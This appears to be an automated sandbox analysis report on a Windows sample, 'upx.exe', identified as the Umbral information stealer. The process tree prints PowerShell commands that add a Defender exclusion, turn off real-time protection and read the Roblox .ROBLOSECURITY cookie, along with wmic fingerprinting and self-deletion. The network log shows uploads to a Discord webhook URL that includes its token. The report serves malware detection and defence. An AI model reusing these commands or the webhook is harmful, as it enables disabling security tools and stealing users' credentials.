Analysis

  • max time kernel
    18s
  • max time network
    16s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    07/09/2024, 17:56 UTC

General

  • Target

    upx.exe

  • Size

    232KB

  • MD5

    4f64d4d9289bdfcf55fe7a4de0e07f27

  • SHA1

    9981fb1876461216a376558f41fa67ba4bc64aba

  • SHA256

    8b8e99eb8ab351e0c1d45aac62784d4e941eb4816ec00736704c564c670555da

  • SHA512

    78a60559439a7b0d16fcb926c8ba16531cbaf34fdc47f0abdc236921e6f196fe829118cd8ee252c3699486a849a5ffcb2744f3ef802ed8f39369388f1b9c326b

  • SSDEEP

    6144:9loZM+rIkd8g+EtXHkv/iD43jn0BPUon4WvRsY90vb8e1mnxFi:foZtL+EP83jn0BPUon4WvRsY9uYm

Malware Config

Signatures

  • Detect Umbral payload 1 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Using powershell.exe command.

  • Drops file in Drivers directory 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 25 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 38 IoCs
  • Suspicious use of SendNotifyMessage 38 IoCs
  • Suspicious use of WriteProcessMemory 26 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\upx.exe
    "C:\Users\Admin\AppData\Local\Temp\upx.exe"
    1⤵
    • Drops file in Drivers directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2052
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" csproduct get uuid
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:3276
    • C:\Windows\SYSTEM32\attrib.exe
      "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\upx.exe"
      2⤵
      • Views/modifies file attributes
      PID:348
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\upx.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4592
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4584
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4572
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:936
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" os get Caption
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:4996
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" computersystem get totalphysicalmemory
      2⤵
        PID:5016
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" csproduct get uuid
        2⤵
          PID:5116
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
          2⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          PID:3240
        • C:\Windows\System32\Wbem\wmic.exe
          "wmic" path win32_VideoController get name
          2⤵
          • Detects videocard installed
          PID:4884
        • C:\Windows\SYSTEM32\cmd.exe
          "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\upx.exe" && pause
          2⤵
          • System Network Configuration Discovery: Internet Connection Discovery
          • Suspicious use of WriteProcessMemory
          PID:2984
          • C:\Windows\system32\PING.EXE
            ping localhost
            3⤵
            • System Network Configuration Discovery: Internet Connection Discovery
            • Runs ping.exe
            PID:3448
      • C:\Windows\system32\taskmgr.exe
        "C:\Windows\system32\taskmgr.exe" /4
        1⤵
        • Checks SCSI registry key(s)
        • Checks processor information in registry
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        PID:4628

      Network

      • flag-us
        DNS
        gstatic.com
        upx.exe
        Remote address:
        8.8.8.8:53
        Request
        gstatic.com
        IN A
        Response
        gstatic.com
        IN A
        142.250.102.94
        gstatic.com
        IN A
        142.250.102.120
      • flag-nl
        GET
        https://gstatic.com/generate_204
        upx.exe
        Remote address:
        142.250.102.94:443
        Request
        GET /generate_204 HTTP/1.1
        Host: gstatic.com
        Connection: Keep-Alive
        Response
        HTTP/1.1 204 No Content
        Content-Length: 0
        Cross-Origin-Resource-Policy: cross-origin
        Date: Sat, 07 Sep 2024 17:56:48 GMT
        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
      • flag-us
        DNS
        ip-api.com
        upx.exe
        Remote address:
        8.8.8.8:53
        Request
        ip-api.com
        IN A
        Response
        ip-api.com
        IN A
        208.95.112.1
      • flag-us
        GET
        http://ip-api.com/line/?fields=hosting
        upx.exe
        Remote address:
        208.95.112.1:80
        Request
        GET /line/?fields=hosting HTTP/1.1
        Host: ip-api.com
        Connection: Keep-Alive
        Response
        HTTP/1.1 200 OK
        Date: Sat, 07 Sep 2024 17:56:48 GMT
        Content-Type: text/plain; charset=utf-8
        Content-Length: 6
        Access-Control-Allow-Origin: *
        X-Ttl: 60
        X-Rl: 44
      • flag-us
        DNS
        94.102.250.142.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        94.102.250.142.in-addr.arpa
        IN PTR
        Response
        94.102.250.142.in-addr.arpa
        IN PTR
        rb-in-f941e100net
      • flag-us
        DNS
        58.55.71.13.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        58.55.71.13.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        83.210.23.2.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        83.210.23.2.in-addr.arpa
        IN PTR
        Response
        83.210.23.2.in-addr.arpa
        IN PTR
        a2-23-210-83deploystaticakamaitechnologiescom
      • flag-us
        DNS
        1.112.95.208.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        1.112.95.208.in-addr.arpa
        IN PTR
        Response
        1.112.95.208.in-addr.arpa
        IN PTR
        ip-apicom
      • flag-us
        DNS
        72.32.126.40.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        72.32.126.40.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        95.221.229.192.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        95.221.229.192.in-addr.arpa
        IN PTR
        Response
      • flag-us
        GET
        http://ip-api.com/json/?fields=225545
        upx.exe
        Remote address:
        208.95.112.1:80
        Request
        GET /json/?fields=225545 HTTP/1.1
        Host: ip-api.com
        Response
        HTTP/1.1 200 OK
        Date: Sat, 07 Sep 2024 17:56:53 GMT
        Content-Type: application/json; charset=utf-8
        Content-Length: 161
        Access-Control-Allow-Origin: *
        X-Ttl: 60
        X-Rl: 44
      • flag-us
        DNS
        discord.com
        upx.exe
        Remote address:
        8.8.8.8:53
        Request
        discord.com
        IN A
        Response
        discord.com
        IN A
        162.159.136.232
        discord.com
        IN A
        162.159.137.232
        discord.com
        IN A
        162.159.128.233
        discord.com
        IN A
        162.159.138.232
        discord.com
        IN A
        162.159.135.232
      • flag-us
        POST
        https://discord.com/api/webhooks/1281530185321156663/D5zfp8fwZ0airaU9qx4oZzemQX8eWe_A9whpSCBsH5minNFS7aRp31EvssVYVENCN25Q
        upx.exe
        Remote address:
        162.159.136.232:443
        Request
        POST /api/webhooks/1281530185321156663/D5zfp8fwZ0airaU9qx4oZzemQX8eWe_A9whpSCBsH5minNFS7aRp31EvssVYVENCN25Q HTTP/1.1
        Accept: application/json
        User-Agent: Opera/9.80 (Windows NT 6.1; YB/4.0.0) Presto/2.12.388 Version/12.17
        Content-Type: application/json; charset=utf-8
        Host: discord.com
        Content-Length: 940
        Expect: 100-continue
        Connection: Keep-Alive
        Response
        HTTP/1.1 404 Not Found
        Date: Sat, 07 Sep 2024 17:56:55 GMT
        Content-Type: application/json
        Content-Length: 45
        Connection: keep-alive
        set-cookie: __dcfduid=91b5ec946d4211ef942832fb9df3a4a4; Expires=Thu, 06-Sep-2029 17:56:55 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
        strict-transport-security: max-age=31536000; includeSubDomains; preload
        x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
        x-ratelimit-limit: 5
        x-ratelimit-remaining: 4
        x-ratelimit-reset: 1725731816
        x-ratelimit-reset-after: 1
        via: 1.1 google
        alt-svc: h3=":443"; ma=86400
        CF-Cache-Status: DYNAMIC
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PiNOFXvjyGFHK9jWHogN%2FAlbPd8Nida4%2B1UCt3tUI%2FzoWDFOlwUqs%2B%2B%2FiCfYQJfHrTR0YVWB%2BOQfrxQvMa2mdCUudnfWOWaHQ%2FeyMkWx0b8g8hX7icA7WWDHmG5P"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        X-Content-Type-Options: nosniff
        Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
        Set-Cookie: __sdcfduid=91b5ec946d4211ef942832fb9df3a4a4ddf5de5c841413681db79f86f7881972c82d9a1b02b740d0d9bd3021891a5642; Expires=Thu, 06-Sep-2029 17:56:55 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
        Set-Cookie: __cfruid=f3984c34cb95290867d0b5aa52118be88541701d-1725731815; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
        Set-Cookie: _cfuvid=nUR_j3ETJ7rkPTNFlgcuB2gVlDVNBeS7qg8o36c9xsk-1725731815213-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
        Server: cloudflare
        CF-RAY: 8bf894042d88becd-LHR
      • flag-us
        POST
        https://discord.com/api/webhooks/1281530185321156663/D5zfp8fwZ0airaU9qx4oZzemQX8eWe_A9whpSCBsH5minNFS7aRp31EvssVYVENCN25Q
        upx.exe
        Remote address:
        162.159.136.232:443
        Request
        POST /api/webhooks/1281530185321156663/D5zfp8fwZ0airaU9qx4oZzemQX8eWe_A9whpSCBsH5minNFS7aRp31EvssVYVENCN25Q HTTP/1.1
        Accept: application/json
        User-Agent: Opera/9.80 (Windows NT 6.1; YB/4.0.0) Presto/2.12.388 Version/12.17
        Content-Type: multipart/form-data; boundary="6a56bb30-357c-4ed8-8bf9-9717812b1a1d"
        Host: discord.com
        Cookie: __dcfduid=91b5ec946d4211ef942832fb9df3a4a4; __sdcfduid=91b5ec946d4211ef942832fb9df3a4a4ddf5de5c841413681db79f86f7881972c82d9a1b02b740d0d9bd3021891a5642; __cfruid=f3984c34cb95290867d0b5aa52118be88541701d-1725731815; _cfuvid=nUR_j3ETJ7rkPTNFlgcuB2gVlDVNBeS7qg8o36c9xsk-1725731815213-0.0.1.1-604800000
        Content-Length: 427191
        Expect: 100-continue
        Response
        HTTP/1.1 404 Not Found
        Date: Sat, 07 Sep 2024 17:56:56 GMT
        Content-Type: application/json
        Content-Length: 45
        Connection: keep-alive
        strict-transport-security: max-age=31536000; includeSubDomains; preload
        x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
        x-ratelimit-limit: 5
        x-ratelimit-remaining: 4
        x-ratelimit-reset: 1725731817
        x-ratelimit-reset-after: 1
        via: 1.1 google
        alt-svc: h3=":443"; ma=86400
        CF-Cache-Status: DYNAMIC
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BCDXWmy0zPla%2FEbyGLJ94qlDGZf6Kwsw8mXhaXS0imXZPYAIx7O54xw43P4tmpiLFVSL4jt7CcXR7mmOvyylW4%2BBW5Vf1g5aQlcg8sZetXpsYNWY%2B4EiBlsu0nXj"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        X-Content-Type-Options: nosniff
        Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
        Server: cloudflare
        CF-RAY: 8bf894056ebfbecd-LHR
      • flag-us
        DNS
        232.136.159.162.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        232.136.159.162.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        228.249.119.40.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        228.249.119.40.in-addr.arpa
        IN PTR
        Response
      • 142.250.102.94:443
        https://gstatic.com/generate_204
        tls, http
        upx.exe
        724 B
        4.9kB
        8
        8

        HTTP Request

        GET https://gstatic.com/generate_204

        HTTP Response

        204
      • 208.95.112.1:80
        http://ip-api.com/line/?fields=hosting
        http
        upx.exe
        310 B
        267 B
        5
        2

        HTTP Request

        GET http://ip-api.com/line/?fields=hosting

        HTTP Response

        200
      • 208.95.112.1:80
        http://ip-api.com/json/?fields=225545
        http
        upx.exe
        383 B
        562 B
        7
        5

        HTTP Request

        GET http://ip-api.com/json/?fields=225545

        HTTP Response

        200
      • 162.159.136.232:443
        https://discord.com/api/webhooks/1281530185321156663/D5zfp8fwZ0airaU9qx4oZzemQX8eWe_A9whpSCBsH5minNFS7aRp31EvssVYVENCN25Q
        tls, http
        upx.exe
        472.9kB
        10.6kB
        350
        121

        HTTP Request

        POST https://discord.com/api/webhooks/1281530185321156663/D5zfp8fwZ0airaU9qx4oZzemQX8eWe_A9whpSCBsH5minNFS7aRp31EvssVYVENCN25Q

        HTTP Response

        404

        HTTP Request

        POST https://discord.com/api/webhooks/1281530185321156663/D5zfp8fwZ0airaU9qx4oZzemQX8eWe_A9whpSCBsH5minNFS7aRp31EvssVYVENCN25Q

        HTTP Response

        404
      • 8.8.8.8:53
        gstatic.com
        dns
        upx.exe
        57 B
        89 B
        1
        1

        DNS Request

        gstatic.com

        DNS Response

        142.250.102.94
        142.250.102.120

      • 8.8.8.8:53
        ip-api.com
        dns
        upx.exe
        56 B
        72 B
        1
        1

        DNS Request

        ip-api.com

        DNS Response

        208.95.112.1

      • 8.8.8.8:53
        94.102.250.142.in-addr.arpa
        dns
        73 B
        106 B
        1
        1

        DNS Request

        94.102.250.142.in-addr.arpa

      • 8.8.8.8:53
        58.55.71.13.in-addr.arpa
        dns
        70 B
        144 B
        1
        1

        DNS Request

        58.55.71.13.in-addr.arpa

      • 8.8.8.8:53
        83.210.23.2.in-addr.arpa
        dns
        70 B
        133 B
        1
        1

        DNS Request

        83.210.23.2.in-addr.arpa

      • 8.8.8.8:53
        1.112.95.208.in-addr.arpa
        dns
        71 B
        95 B
        1
        1

        DNS Request

        1.112.95.208.in-addr.arpa

      • 8.8.8.8:53
        72.32.126.40.in-addr.arpa
        dns
        71 B
        157 B
        1
        1

        DNS Request

        72.32.126.40.in-addr.arpa

      • 8.8.8.8:53
        95.221.229.192.in-addr.arpa
        dns
        73 B
        144 B
        1
        1

        DNS Request

        95.221.229.192.in-addr.arpa

      • 8.8.8.8:53
        discord.com
        dns
        upx.exe
        57 B
        137 B
        1
        1

        DNS Request

        discord.com

        DNS Response

        162.159.136.232
        162.159.137.232
        162.159.128.233
        162.159.138.232
        162.159.135.232

      • 8.8.8.8:53
        232.136.159.162.in-addr.arpa
        dns
        74 B
        136 B
        1
        1

        DNS Request

        232.136.159.162.in-addr.arpa

      • 8.8.8.8:53
        228.249.119.40.in-addr.arpa
        dns
        73 B
        159 B
        1
        1

        DNS Request

        228.249.119.40.in-addr.arpa

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

        Filesize

        2KB

        MD5

        d85ba6ff808d9e5444a4b369f5bc2730

        SHA1

        31aa9d96590fff6981b315e0b391b575e4c0804a

        SHA256

        84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

        SHA512

        8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        944B

        MD5

        6d3e9c29fe44e90aae6ed30ccf799ca8

        SHA1

        c7974ef72264bbdf13a2793ccf1aed11bc565dce

        SHA256

        2360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d

        SHA512

        60c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        948B

        MD5

        8bbd6908e148d61010a3130cb6aae4a0

        SHA1

        e74bcc1b0f762fcd7469d0621b9c7fe50b0c365d

        SHA256

        79c8ed7085737723dbc7c40b32d01ea400171787259b7458561cd5db60401023

        SHA512

        38057edb5f2ce86329f558bf34224c6110443635756b1b26da99f89b13e3f971bf602939f40d3fce8459cfdab4ad4fa4928ecb933ff045173535fcc46fe4855f

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        1KB

        MD5

        276798eeb29a49dc6e199768bc9c2e71

        SHA1

        5fdc8ccb897ac2df7476fbb07517aca5b7a6205b

        SHA256

        cd0a1056e8f1b6cb5cb328532239d802f4e2aa8f8fcdc0fcb487684bd68e0dcc

        SHA512

        0d34fce64bbefc57d64fa6e03ca886952263d5f24df9c1c4cce6a1e8f5a47a9a21e9820f8d38caa7f7b43a52336ce00b738ea18419aaa7c788b72e04ce19e4f2

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        1KB

        MD5

        ac057a92f4b62d8880169af0693ef5b2

        SHA1

        66e7c7834c5dae5cec863ccd69403150d05841f4

        SHA256

        7cef55990e8e6cfe07e1965b303e79ac562cdc128ab82edf480d9873f72bb3ed

        SHA512

        d525f47da9e61fc87e55aca6b34e776be3ed081b719bbbb5256705a6afe5fdd4c16d5ee595af13994e2718f789f5fd32830331347d97b029c031c9dfe30c7f49

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_aygpiy0n.pjj.ps1

        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      • memory/2052-103-0x00007FFE6B870000-0x00007FFE6C331000-memory.dmp

        Filesize

        10.8MB

      • memory/2052-0-0x00007FFE6B873000-0x00007FFE6B875000-memory.dmp

        Filesize

        8KB

      • memory/2052-71-0x0000029C9E3B0000-0x0000029C9E3BA000-memory.dmp

        Filesize

        40KB

      • memory/2052-72-0x0000029C9E810000-0x0000029C9E822000-memory.dmp

        Filesize

        72KB

      • memory/2052-2-0x00007FFE6B870000-0x00007FFE6C331000-memory.dmp

        Filesize

        10.8MB

      • memory/2052-33-0x0000029C9E690000-0x0000029C9E706000-memory.dmp

        Filesize

        472KB

      • memory/2052-34-0x0000029C9E3E0000-0x0000029C9E430000-memory.dmp

        Filesize

        320KB

      • memory/2052-35-0x0000029C9E390000-0x0000029C9E3AE000-memory.dmp

        Filesize

        120KB

      • memory/2052-1-0x0000029C83F10000-0x0000029C83F50000-memory.dmp

        Filesize

        256KB

      • memory/4592-15-0x00007FFE6B870000-0x00007FFE6C331000-memory.dmp

        Filesize

        10.8MB

      • memory/4592-18-0x00007FFE6B870000-0x00007FFE6C331000-memory.dmp

        Filesize

        10.8MB

      • memory/4592-14-0x00007FFE6B870000-0x00007FFE6C331000-memory.dmp

        Filesize

        10.8MB

      • memory/4592-4-0x000001F96A240000-0x000001F96A262000-memory.dmp

        Filesize

        136KB

      • memory/4592-3-0x00007FFE6B870000-0x00007FFE6C331000-memory.dmp

        Filesize

        10.8MB

      • memory/4628-99-0x000001A9FBB10000-0x000001A9FBB11000-memory.dmp

        Filesize

        4KB

      • memory/4628-87-0x000001A9FBB10000-0x000001A9FBB11000-memory.dmp

        Filesize

        4KB

      • memory/4628-88-0x000001A9FBB10000-0x000001A9FBB11000-memory.dmp

        Filesize

        4KB

      • memory/4628-98-0x000001A9FBB10000-0x000001A9FBB11000-memory.dmp

        Filesize

        4KB

      • memory/4628-97-0x000001A9FBB10000-0x000001A9FBB11000-memory.dmp

        Filesize

        4KB

      • memory/4628-96-0x000001A9FBB10000-0x000001A9FBB11000-memory.dmp

        Filesize

        4KB

      • memory/4628-95-0x000001A9FBB10000-0x000001A9FBB11000-memory.dmp

        Filesize

        4KB

      • memory/4628-94-0x000001A9FBB10000-0x000001A9FBB11000-memory.dmp

        Filesize

        4KB

      • memory/4628-93-0x000001A9FBB10000-0x000001A9FBB11000-memory.dmp

        Filesize

        4KB

      • memory/4628-89-0x000001A9FBB10000-0x000001A9FBB11000-memory.dmp

        Filesize

        4KB

      We care about your privacy.

      This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.